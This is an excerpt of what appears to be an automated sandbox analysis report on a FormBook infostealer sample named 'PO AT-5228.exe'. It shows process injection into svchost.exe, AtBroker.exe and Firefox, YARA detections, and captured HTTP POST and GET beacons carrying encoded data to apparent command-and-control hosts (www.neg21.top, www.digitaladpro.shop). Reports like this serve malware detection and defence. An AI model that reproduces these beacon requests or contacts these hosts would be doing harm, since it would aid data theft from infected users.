                                                                                      Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                      Nov 13, 2024 09:28:59.451972961 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                      Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                      Nov 13, 2024 09:28:59.452073097 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                      Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
                                                                                      Nov 13, 2024 09:28:59.457120895 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31
                                                                                      Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 59118 | 206.119.81.36 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:29:05.187763929 CET | 777 | OUT | POST /1i1f/ HTTP/1.1
    Host: www.neg21.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.neg21.top
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    Content-Length: 199
    Referer: http://www.neg21.top/1i1f/
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
    Data Raw: 72 50 3d 51 53 77 36 67 52 37 30 45 69 77 31 77 46 58 62 62 33 78 4d 50 45 58 33 39 58 48 57 37 2f 79 76 34 69 7a 58 32 56 61 53 38 45 34 61 63 2f 67 4d 32 4b 72 30 77 6c 50 38 55 31 4a 32 57 2b 63 61 56 4c 76 71 4c 35 47 46 32 4d 6b 47 31 42 4d 6b 39 71 72 32 64 54 53 4b 4a 42 5a 38 78 47 37 42 5a 74 2f 38 58 75 6f 43 56 79 53 36 64 31 37 59 43 56 59 6a 73 43 42 77 6d 4a 4b 43 52 7a 4c 34 48 55 79 65 54 55 79 49 71 6e 32 66 6e 62 77 32 43 77 47 68 50 63 6b 69 6b 49 2b 32 39 47 57 4d 6a 69 39 6d 71 4e 7a 2f 31 74 5a 56 6b 54 4d 6f 59 39 62 4a 30 70 79 41 6d 37 57 63 67 45 6c 59 61 41 3d 3d
    Data Ascii: rP=QSw6gR70Eiw1wFXbb3xMPEX39XHW7/yv4izX2VaS8E4ac/gM2Kr0wlP8U1J2W+caVLvqL5GF2MkG1BMk9qr2dTSKJBZ8xG7BZt/8XuoCVyS6d17YCVYjsCBwmJKCRzL4HUyeTUyIqn2fnbw2CwGhPckikI+29GWMji9mqNz/1tZVkTMoY9bJ0pyAm7WcgElYaA==
Nov 13, 2024 09:29:06.128611088 CET | 691 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 13 Nov 2024 08:29:05 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 59119 | 206.119.81.36 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:29:07.783067942 CET | 797 | OUT | POST /1i1f/ HTTP/1.1
    Host: www.neg21.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.neg21.top
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    Content-Length: 219
    Referer: http://www.neg21.top/1i1f/
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
    Data Raw: 72 50 3d 51 53 77 36 67 52 37 30 45 69 77 31 79 6d 50 62 5a 51 6c 4d 4e 6b 58 77 34 58 48 57 69 76 79 72 34 69 2f 58 32 51 36 43 38 32 63 61 63 66 51 4d 6b 62 72 30 39 46 50 38 41 6c 4a 35 59 65 63 56 56 4d 6e 59 4c 38 2b 46 32 4d 67 47 31 42 38 6b 39 5a 44 31 64 44 53 49 53 78 5a 2b 31 47 37 42 5a 74 2f 38 58 75 39 76 56 79 4b 36 65 42 2f 59 45 48 38 67 67 69 42 33 72 5a 4b 43 48 44 4c 30 48 55 7a 6b 54 56 65 75 71 6c 4f 66 6e 5a 34 32 43 6c 36 75 61 73 6c 6e 35 59 2f 45 30 6b 72 63 36 78 55 61 6e 66 66 59 36 65 31 6b 6f 31 42 79 4a 4d 36 65 6d 70 57 7a 37 38 66 6f 74 48 59 52 42 4b 6e 58 53 32 50 58 41 52 6b 53 41 69 58 42 69 55 62 55 39 32 77 3d
    Data Ascii: rP=QSw6gR70Eiw1ymPbZQlMNkXw4XHWivyr4i/X2Q6C82cacfQMkbr09FP8AlJ5YecVVMnYL8+F2MgG1B8k9ZD1dDSISxZ+1G7BZt/8Xu9vVyK6eB/YEH8ggiB3rZKCHDL0HUzkTVeuqlOfnZ42Cl6uasln5Y/E0krc6xUanffY6e1ko1ByJM6empWz78fotHYRBKnXS2PXARkSAiXBiUbU92w=
Nov 13, 2024 09:29:08.728703022 CET | 691 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 13 Nov 2024 08:29:08 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 59120 | 206.119.81.36 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:29:10.320333958 CET | 10879 | OUT | POST /1i1f/ HTTP/1.1
    Host: www.neg21.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.neg21.top
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    Content-Length: 10299
    Referer: http://www.neg21.top/1i1f/
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
    Data Raw: 72 50 3d 51 53 77 36 67 52 37 30 45 69 77 31 79 6d 50 62 5a 51 6c 4d 4e 6b 58 77 34 58 48 57 69 76 79 72 34 69 2f 58 32 51 36 43 38 32 55 61 63 75 77 4d 32 73 2f 30 79 6c 50 38 44 6c 4a 36 59 65 63 79 56 4e 44 63 4c 38 36 4b 32 4f 6f 47 30 69 30 6b 31 49 44 31 57 44 53 49 4e 42 5a 2f 78 47 36 56 5a 75 48 77 58 75 74 76 56 79 4b 36 65 41 50 59 53 6c 59 67 6d 69 42 77 6d 4a 4b 4f 52 7a 4b 72 48 55 36 47 54 56 71 59 70 55 75 66 67 36 51 32 4f 33 53 75 47 38 6c 70 36 59 2f 63 30 6b 6d 47 36 78 4a 72 6e 62 66 69 36 64 70 6b 35 52 77 53 55 50 6d 43 6b 34 2b 62 73 4d 72 43 70 6d 51 57 4b 34 2b 75 65 6c 58 2b 61 44 34 51 62 52 75 74 78 42 50 66 75 6a 49 43 4e 74 78 6b 69 56 78 48 41 66 6e 6e 5a 78 44 31 6a 74 35 30 63 42 64 48 72 67 75 77 73 67 59 71 39 36 63 67 43 69 6f 79 54 33 63 57 42 71 38 4e 4a 4a 52 69 52 78 53 69 42 79 69 71 55 4e 62 30 7a 4f 72 39 50 74 73 4c 62 68 51 46 70 53 74 33 54 62 4c 54 33 6e 64 68 54 69 39 39 4b 37 4b 32 70 55 39 4b 43 58 58 6b 37 4f 6a 6b 78 54 73 76 78 54 43 4c 67 53 63 [TRUNCATED]
    Data Ascii: rP= [TRUNCATED]
Nov 13, 2024 09:29:11.276030064 CET | 691 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 13 Nov 2024 08:29:11 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 59121 | 206.119.81.36 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe

Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:29:12.864058971 CET | 523 | OUT | GET /1i1f/?rP=dQYajm//Sx1stwXHf3xlHA3S8l/u0vyC8xP2ywW2sRY4KNcSndLgw2rkEnULaIMwbbOqPpfkjMw6pD0cpqqLVjWWADBg9XXOC9f0UMcBOgWMQTbzF2Ef3i8=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
    Host: www.neg21.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:29:13.811515093 CET | 691 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 13 Nov 2024 08:29:13 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.459122172.217.16.211802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:29:19.046355009 CET801OUTPOST /m6se/ HTTP/1.1
                                                                                      Host: www.digitaladpro.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.digitaladpro.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.digitaladpro.shop/m6se/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 4c 6b 31 53 70 32 36 79 42 64 58 45 46 32 6c 79 6b 67 4e 62 70 62 6c 6c 6e 6a 72 77 6b 6c 47 4f 41 65 76 46 31 6f 42 46 78 5a 61 33 66 57 38 45 74 42 4d 41 54 46 49 56 43 79 47 35 78 35 78 58 70 61 4e 59 72 6b 34 49 70 4f 47 63 58 37 67 54 54 42 6c 2f 76 68 34 56 52 6e 4b 67 42 51 73 54 47 42 58 4b 51 79 62 4a 2b 32 56 54 50 39 2b 43 78 68 73 6d 6e 76 73 32 69 45 70 6d 53 36 2f 6b 34 35 42 2f 66 61 63 77 6d 54 6f 4d 4b 6a 62 59 58 4d 4a 67 74 57 35 44 61 71 6d 70 4a 73 64 6c 4a 42 6b 6c 78 63 39 6e 78 6c 52 34 58 48 57 61 41 34 43 51 7a 67 3d 3d
                                                                                      Data Ascii: rP=grjygjBzNeYALk1Sp26yBdXEF2lykgNbpbllnjrwklGOAevF1oBFxZa3fW8EtBMATFIVCyG5x5xXpaNYrk4IpOGcX7gTTBl/vh4VRnKgBQsTGBXKQybJ+2VTP9+Cxhsmnvs2iEpmS6/k45B/facwmToMKjbYXMJgtW5DaqmpJsdlJBklxc9nxlR4XHWaA4CQzg==
                                                                                      Nov 13, 2024 09:29:19.904666901 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:29:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Server: ghs
                                                                                      Content-Length: 1566
                                                                                      X-XSS-Protection: 0
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                      Nov 13, 2024 09:29:19.904683113 CET  537  IN
                                                                                      Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                      Target ID:0
                                                                                      Start time:03:26:13
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\PO AT-5228.exe"
                                                                                      Imagebase:0xb60000
                                                                                      File size:1'175'040 bytes
                                                                                      MD5 hash:3DF965173D78ACBF95001CACCBEAA150
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:03:26:15
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\PO AT-5228.exe"
                                                                                      Imagebase:0x5c0000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:03:26:17
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe"
                                                                                      Imagebase:0xa80000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:3
                                                                                      Start time:03:26:19
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Windows\SysWOW64\AtBroker.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
                                                                                      Imagebase:0xde0000
                                                                                      File size:68'608 bytes
                                                                                      MD5 hash:D5B61959A509BDA85300781F5A829610
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:5
                                                                                      Start time:03:26:31
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe"
                                                                                      Imagebase:0xa80000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:8
                                                                                      Start time:03:26:48
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff6bf500000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
